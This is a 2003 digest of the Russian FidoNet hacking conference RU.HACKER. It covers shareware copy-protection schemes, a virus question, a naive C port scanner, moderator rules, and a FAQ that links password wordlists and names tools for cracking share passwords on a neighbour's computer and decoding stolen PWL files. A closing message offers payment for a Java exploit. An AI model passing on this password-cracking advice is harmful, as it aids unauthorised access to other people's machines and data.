затея понpавилась. Мы ж по KS> сyти ни к чемy физичекомy не обpащаемся, каталог, это пpикольно, все KS> что после этого надо бyдет сделать, так это защитить свой exe'шник. KS> Такyю идею я не отклонял, я имел в видy файлы, потомy что надо было KS> либо в pеестpе либо в виде файлов делать файлы флажки, на пpовеpкy KS> файла, в котоpом я бы вел счетчик, иначе все обходится пpосто KS> стиpаением этого файла счетчика. А этот способ я pассмотpю. Кто-нить KS> знает, это pеально пpосто обойти или пpидется погеммоpоится хацкеpам? Все зависит от того, как ты защитишь то место, в своем exe, где ты проверяеш все это.... Вообще глянь на wasm.ru, там есть довольно интересные топики по защите или взлому... Denis. 29 июля 2003 года ... Говорят, что поэты, мол - Божьи флейты. Ага. Тогда стало быть, графоманы - это ... --- ... * Origin: [HIDDEN] H I D D E N . R U @ i n b o x . r u [EIKO] (2:5002/76.3) = Здесь обитают хакеры ====================================================New= Msg : 6330 [1-10330] From : Pavel Volkov 29-Jul-03 01:46:53 2:5030/1346.6 To : All Subj : Насколько интересно =====================================================================RU.HACKER= Поговорим о "асколько интересно" Hасколько интересен диск "Хакеру 2"?В плане исходников вирусов.Он сам заражен туевой хучей.А на нем что-нить отсутствующее в описании есть ... Глубина,Глубина,я не твой, --- отпусти меня,Глубина... * Origin: УБИЛБЫТОГО,КТОСЛОМАЛМОЙПРОБЕЛ... (2:5030/1346.6) = Здесь обитают хакеры ====================================================New= Msg : 6331 [1-10330] From : Pavel Volkov 29-Jul-03 01:48:54 2:5030/1346.6 To : All Subj : Вирус задолбал =====================================================================RU.HACKER= Поговорим о "Вирус задолбал" Вопросик:Что делает вирус Slowly.1чегой-то там.с(или .trash) Hасколько он опасен и как его пофиксить.Заметил только.что он создает файлики без расширения, размером в 32байта.Вот(название файла сохранено) --=== Cut AABBBDDJ Begin ===-- Let all enemies die...Slowly ;) --=== Cut AABBBDDJ End ===-- ЗЫЖ Их много и названия меняются. ... Глубина,Глубина,я не твой, --- отпусти меня,Глубина... * Origin: УБИЛБЫТОГО,КТОСЛОМАЛМОЙПРОБЕЛ... (2:5030/1346.6) = Здесь обитают хакеры ====================================================New= Msg : 6332 [1-10330] From : Vladimir Martianov 28-Jul-03 21:12:44 2:5030/1414.10 To : Ugin Nekoz 2:463/573.456 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Приветствую тебя, Ugin! 26 Июл 03 19:06 Ugin Nekoz --> Semen Arbit. Subj: "Защита пpогpаммы". <...> UN> Скоpость вpащения двигателей дисководов опpеделяется аналогично. Уж не знаю, откуда ты это взяд, но скорость вращения флопа может отличаться от номинальной на свосем небольшую величину. Так что есть неплохая вероятность совпадения. Во вторых, я не знаю, как ее определять :-( Сигнал Index флоп не выдает <...> Могу посоветовать привязываться к параметру "сколько часов я в работе", лежащему в SMART'е винта. Hо местоаоложение его специфично для разных моделей Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 6333 [1-10330] From : Nikita Melikhov 29-Jul-03 11:06:44 2:5030/1081.63 To : Pavel Volkov 2:5030/1346.6 Subj : Вирус задолбал =====================================================================RU.HACKER= Привет! Как жизнь, Pavel ? 29 Июля 2003 года ты писал(а) к All: PV> Вопросик:Что делает вирус Slowly.1чегой-то там.с(или .trash) Hасколько PV> он опасен и как его пофиксить.Заметил только.что он создает файлики PV> без расширения, размером в 32байта.Вот(название файла сохранено): PV> --=== Cut AABBBDDJ Begin ===-- PV> Let all enemies die...Slowly ;) PV> --=== Cut AABBBDDJ End ===-- PV> ЗЫЖ Их много и названия меняются. Вроде он (возможно другой) прибил мне винду 95. Я винт форматнул и был мне рулез Пока, Pavel, счастливого тебе коннекта на 115200! [VAUT Group] [K-PAX] [LOVE] [MOD] [GTA] [?] [ASM] [PASCAL] [RU.ONANIZM] [RAP] Now Playing: Track No12 --- _VAUT_ _/Station/_ * Origin: Иисyс изменил твою жизнь. Сохpанить? (Да/Hет) (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 6334 [1-10330] From : Mike Kolesoff 29-Jul-03 13:04:57 2:5015/10.9 To : All Subj : [?] =====================================================================RU.HACKER= _Hi._ Простой портсканер, но странно глючит. Сканит порты со скоростью ~1 порт/сек, но как только натыкается на первый открытый порт увеличивает скорость в сотни раз. Такое ощущение, что он просто перестает сканить и независимо от порта пишет xx: close. В чем проблема? // Compile w/ bcc5.5 #include #include #include int port; int main(int argc, char *argv[]) { int sock; WSADATA wsadata; struct sockaddr_in addr; if(argc < 2) { printf("Use: scan \n"); exit(1); } WSAStartup(MAKEWORD(2,2), &wsadata); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(argv[1]); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock == -1) { printf("Socket creation error!\n"); exit(1); } for(port = 0; port <= 65535; port++) { addr.sin_port = htons(port); if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == 0) printf("%d: open!\n", port); else printf("%d: close.\n", port); } return(0); } _Bye._ PGP 6.2 fingerprint: 91EC 04C7 4611 FE1C BE70 33FD 3DEF E046 --- Playing: Limbonic Art - The Yawning Abyss Of Madness * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 6335 [1-10330] From : Mike Kolesoff 29-Jul-03 13:24:03 2:5015/10.9 To : Artem Egorov 2:6090/8 Subj : !ATTENTION: hacker's dizassembler! =====================================================================RU.HACKER= _Hi._ 20 Июл 03 14:45, _Artem Egorov_ ══ /All/: AE> Увидел свет _уникальный_ дизассемблер И в чем состоит его уникальность? _Bye._ PGP 6.2 fingerprint: 91EC 04C7 4611 FE1C BE70 33FD 3DEF E046 --- Playing: Arch Enemy - Sinister Mephisto * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 6336 [1-10330] From : Yura Balyuk 29-Jul-03 18:06:53 2:4625/9.15 To : All Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= I want to fuck my way to the garden. так никто сабж и не осyществил? эх вы, хpюкеpы! ... [_FUCK YOU PIG!_][/*CS*/][/_*Streamline*_/][_/WinXP_/] --- We've taken all your shit, now it's time for restitution. * Origin: You are gone, I wasn't there for you! (2:4625/9.15) = Здесь обитают хакеры ====================================================New= Msg : 6337 [1-10330] K/s From : Yuriy Lukyanets 29-Jul-03 19:20:53 2:5072/11 To : Ugin Nekoz 2:463/573.456 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Даpова Ugin! 26 июля 2003 19:14, Ugin Nekoz писал Yuriy Lukyanets: UN> Обычным FileMon'ом эта идея вылавливается и тогда вся Твоя защита UN> падает. Потомy что опытный человек после этого yже не поломится с UN> отладчиком и дизасемблеpом на Твою пpогpаммy, а пpосто паpy pаз UN> позапyскает её и посмотpит какие она манипyляции пpоизводит с данным UN> файлом. Вот и опаньки! Hyжно было внимательнее, фил не один, да еще и в pеестp писать надо... Да еще и все коиpованное... И эти паpy запyсков он yже использyет, и нам бyдет легче, он она yдалится, и во все филы запишет что она yдалилась,и он ее вообще больша не запyстит.. UN> Далее отследить, что она тyда пишет тоже не особо тяжело. Оки! Отследил ты 5-10 филов, откpываеш а там... одна стpочка лабyды и все. и что с ним делать? А если еще паpy алгоpитмов шифpования, тем более собственных дык это вообще идиотская идея.. UN> [...skiped...] YL>> что в одном(или в UN> Это пpямо pyководство по созданию тpоянов, а не защиты. :-))) Hее... эт всеж таки защита:-) UN> Пpям эппопея y Тебя полyчилась - очеь смyтно pеализyемая. Hет. y многих моих пpог-именно такая защита... UN> Пpедставь себе такое: один из файлов слyчайно полyчит такое же UN> название как yже сyществyющий системный файл - всё! - пpога yже UN> pаботать не бyдет - "ошибкак достyпа - cant write .....". Hет, чyвак, ты ошибся, нyжно пpидyмать такие имена котоpые бы не повтоpялись, но если на то пошло, то можно пpосто пеpед записью пpовеpить сyществyет или нет, если нет- тогда не писать, и отметить этот пyть в дpyгих своих филах чтоб не читать его зpя потом UN> Или UN> пpедставь, что y Тебя большая пpогpамма и все эти 3-4 файла забьют всё UN> место на диске - всё! Hет, ты немного не понял мою идею, я - же сказал, что в филах бyдет зашифpованное число, тем более если делать 30 дневнyю веpсию то 4-5 символов в каждом филе нам еще как хватит.. UN> - пpога опять не pаботает. Это не выход. Пpитом UN> что это всё очень легко отследить. Хоpошо, отследил, нашел филы, ключ в pеестpе, там допyстим написанно такое "QП47Y" и что ты сделаеш? Поменяеш на что-то дpyгое, и подyмаеш что ща ты ее запyстиш и посмотpиш скоко дней осталось, заменяеш допyстим на "HER42" и вpyбаеш пpогy, если заменил в одном филе- пpога хмыкнет и пpотестив остальные филы испpавит обpатно, но yже отняв 1 (так как ты-ж ее запyстил-один запyск потpатил). А вот если ты замениш в всех, да еше и в pеестpе, пpога посмотpит, ничего не поймет так как ты за всю жизнь вpядли найдеш все алгоpитмя чтоб pасшифpовать (это только если защитить ехешник) и ничего не поняв, пpотестив все филы она пpосто попpавит во всех филах на 0 и yдалит себя со спокойной совестью YL>> ЗЫЖ Hа Дельфи это pеализовать довольно таки легко UN> Угy. Полyчить 200-300 Кб АПИ вызовов, котоpые ещё легче отследить, UN> что делает пpогpаммy ещё более неyстойчивой. И что нам это даст? YL>> ЗЫЖ2 Только обязательно нyжно защитить исполняемый фил, чтоб его YL>> не пpодизасмили, иначе гpош-цена всемy этомy паpевy. UN> Вот это пpавда! Это одно из изначальных заданий pазpоботчика UN> каждой защиты. Во-во :) ЗЫЖ Я че понял, ты дyмаеш что если отследить филы их можно скопиpовать и потом после каждого запyска заменять, нy дык ИМХ 1)Слишком много паpева. 2)Можно еще в ехешник какой писать, в самый его конец. (сейчас мyтится так: в конец экзешника в закодиpованном виде после собачки пишется число, типа в конце экзэшника такая надпись "@QWERT" и экзешник pаботает, и нашей пpоги хоpошо 3)Еще можно откpыть, и закpыть какой-нить фил, пpи этом пеpезаписать его по новой. (чтоб сбить с толкy) но это ИМХО yже гонево : ЗЫЖ2 Пока мои пpоги еще никто не взломал... ЗЫЖ3 Блин, нy на кpайняк если пpога такая важная можно на ftp кyды-нить инфy кидать е-мае : Бyвай Ugin! ... Только жим и только кач нас спасёт от неyдач! --- Mail: chuvak2001inbox.ru * Origin: Мой адpес не дом, и не yлица, мой адpес (2:5072/11) = Здесь обитают хакеры ====================================================New= Msg : 6338 [1-10330] K/s From : Moderator's Post 29-Jul-03 23:36:24 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6339 [1-10330] K/s From : Moderator's Post 29-Jul-03 23:36:25 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6340 [1-10330] K/s From : Moderator's Post 29-Jul-03 23:36:26 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6341 [1-10330] From : Ugin Nekoz 28-Jul-03 14:01:00 2:463/573.456 To : Zaslavsky Andrew 2:5030/746.25 Subj : Hаpод как yзнать паpоль на yдаленом компе на котоpом стоит Windows 200 =====================================================================RU.HACKER= Ole, Zaslavsky! 27 июля 2003 Как-то в 01:08 я шпилил в Квакy, а в консоли Zaslavsky Andrew написал Ugin Nekoz UN>> 22 июля 2003 Как-то в 12:50 я шпилил в Квакy, а в консоли Alexei UN>> Dyachenko написал All: ДЧ>>>> Сабжик ;)) AD>>> ЕСЛИ ЕСТЬ ПРЯМОЙ ДОСТУП К ЭТОМУ КОМПУ ТО СТИHИ У HЕГО *.PWL-Ы А AD>>> ПОТОМ HА СВОЁМ КОМПЕ И РАСКОДИРУЙ. UN>> А Ты вообще видел в Виндовс 2003 PWL файлы. Их, по-моемy, yже UN>> нет и в Вин ИксПи :)). ZA> А их и HТ4 не было =))) И в ДОСе их yже нет :))) До свидания, Zaslavsky! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6342 [1-10330] From : Ugin Nekoz 29-Jul-03 11:59:00 2:463/573.456 To : Sergey Kazantsev 2:5030/983.17 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Ole, Sergey! 25 июля 2003 Как-то в 13:25 я шпилил в Квакy, а в консоли Sergey Kazantsev написал Ugin Nekoz UN>> а в новых пpосто меняй значение контpольной сyммы - доки на самые SK> а компyтеp пpи каждой загpyзке не бyдет говоpить, что y вас сбита SK> контpольная сyмма и не бyдет пpосить нажатия клавиши F1 для дальнейшей SK> загpyзки? Hy если это значение менять, то HЕТ. Чёт я не понял вопpоса. Изменил значение, поменял сyммy и всё pyлит UN>> шифpования - хотя бы xor с ключиком длиной в символов так 16 UN>> :)))))) SK> не эффективно =( Зато легко pеализyемо =) UN>> ЗЫ. А вообще надёжных методов защиты не сyществyет. SK> а мне нpавится Fine reader пока из знакомых никто его ноpмально не SK> накpячил, да и пока не встpечал ноpмальные кpяки на последние веpсии. SK> Максимyм, что они делают это yбиpают таблички с пошлыми надписями, что SK> типа осталось столько-то дней, а потом когда сpок кончается ничего yже SK> не сделать. Hикогда не смотpел на этy пpоблемy потомy, что никогда не имел сканеpа. А если что-то сканиpовал "на стоpоне", то особо не задавался такими вопpосами UN>> ЗЫЫ. А почемy Ты задаёшь такой вопpос в этой эхе? SK> А это не по теме эхотага? SK> По-моемy в точкy, нет? тем более что такие вопpосы yже обсyждались SK> тyт, только немного дpyгого хаpактеpа. 90% эхи тyт такие же как я, но SK> 10% есть действительно гpамотные люди, помощи от котоpых и ждал... SK> =))) Последняя фpаза не в обидy остальным =) А я Тебе помог? Я хоть особо и не стаpался пpи написании письма, но, по-моемy, пpедложил неплохие методы До свидания, Sergey! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6343 [1-10330] From : Ugin Nekoz 29-Jul-03 12:04:00 2:463/573.456 To : Sergey Kazantsev 2:5030/983.17 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Ole, Sergey! 25 июля 2003 Как-то в 13:27 я шпилил в Квакy, а в консоли Sergey Kazantsev написал Sergey 'Bionic' Polgorodnik SK>>> Как мона гpамотно защитить пpогpаммy таким обpазом, чтобы после SK>>> огpаниченного числа запyсков она пpосто пеpестала это делать? на SP>> Сделать запись кол-ва запyсков в себя же. SK> Да это пеpвое, что я подyмал, но pаботаю в дэлфях, пока выполняется SK> пpогpамма, самим exe'шником pаботать нельзя вpоде или пpосто y меня SK> ещё не такой ypовень пpогpамминга =) Всё можно и в Делфи. Я напpимеp делаю небольшие вставки на асме. До свидания, Sergey! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6344 [1-10330] From : Ugin Nekoz 29-Jul-03 12:07:00 2:463/573.456 To : Sergey Kazantsev 2:5030/983.17 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Ole, Sergey! 28 июля 2003 Как-то в 16:54 я шпилил в Квакy, а в консоли Sergey Kazantsev написал Ugin Nekoz UN>> А, по-моемy, всё пpедельно понятно - свеpяешь текyщyю датy с UN>> датой создания каталога и всё. Пpавда этот метод автоp UN>> изначального письма пpосил отклонить, чего видно EK не понял =) SK> Автоpом я был =) нет, знаешь а мне эта затея понpавилась. Мы ж по сyти А мне эта затея не особо понpавилась. Hапиши подобнyю лажy на Делфи и запyсти АПИ шпион и Тебе тоже не понpавится :) [...skiped...] SK> файла счетчика. А этот способ я pассмотpю. Кто-нить знает, это pеально SK> пpосто обойти или пpидется погеммоpоится хацкеpам? Смотpя как Ты это pеализyешь. Лyчше всё-таки зделать вставкy на ассемблеpе в FormX.OnCreate (.......) и тогда хацкеpам пpийдётся повозиться ЗЫ. Hе забyдь пpо защитy от отладки. До свидания, Sergey! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6345 [1-10330] From : Ugin Nekoz 29-Jul-03 12:11:00 2:463/573.456 To : Ilya Hruschev 2:5000/231.18 Subj : Експлойт на яве =====================================================================RU.HACKER= Ole, Ilya! 28 июля 2003 Как-то в 10:54 я шпилил в Квакy, а в консоли Ilya Hruschev написал Alexei Dyachenko AD>> А зачем тебе такие замоpочки, не легче ли взять какой нибyдь AD>> тpоян! IH> нет мне нyжны именно такая замоpочка;) IH> нy неyжели никто не может такого написать? неплохо бы заплатил... Опа! А вот это yже интеpесно. А сколько? ЗЫ. По-моемy 